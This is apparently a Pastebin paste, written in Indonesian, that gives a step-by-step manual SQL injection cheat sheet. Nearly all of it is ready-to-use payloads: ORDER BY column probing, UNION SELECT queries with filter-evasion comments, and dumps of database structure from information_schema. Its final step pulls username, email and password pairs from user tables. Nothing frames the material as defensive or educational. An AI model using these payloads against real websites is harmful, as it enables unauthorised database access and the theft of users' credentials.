RokiAdhytama

Query SQLI

Jun 10th, 2019
167
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.52 KB | None | 0 0
  1. Query Exploit SQL MANUAL
  2.  
  3. STEP 1
  4. UNTUK CEK ERRORNYA
  5.  
  6. +order+by+1--
  7.  
  8. '+order+by+100--+-
  9.  
  10.  
  11. Tahap Memunculkan Angka Ajaib / angka Vuln
  12. +union+select+1,2,3--
  13.  
  14. '+/*!50000union*/+/*!50000select*/+1,2,3--+-
  15.  
  16.  
  17. STEP 2
  18. Tahap Menampikan Database
  19. +union+select+1,2,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),4,5,6--
  20.  
  21. '+union+select+1,2,3,4,concat(@c:=0x00,if((select count(*) from information_schema.columns where table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c),6,7--+-
  22.  
  23. +union select 1,concat (0x494e4a454354204259202e2f4359424552303054202d,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user(),(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))),3,4,5,6--
  24.  
  25.  
  26. STEP 3
  27. (Tahap Menampilkan Data yang ada pada database )
  28.  
  29. +union+select+1,2,3,concat(email,0x3a3a,password),5,6 from user--
  30. '+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(username,0x3a3a,password),22,23,24,25,26,27,28,29,30,31,32,33,34 from users--+-
  31.  
  32. +union+select+1,2,3,concat(username,0x3a3a,password),5,6,7,8,9,10 from kukan_user--
  33.  
  34. '+union+select+1,2,3,4,group_concat(username,0x3a3a,pwd,0x3a3a,level,'<br>'),6,7,8,9,10,11,12,13,14 from user--+-
  35.  
  36. '+union+select+1,2,concat(Username,0x3a,Password),4+from+user--+
Add Comment
Please, Sign In to add comment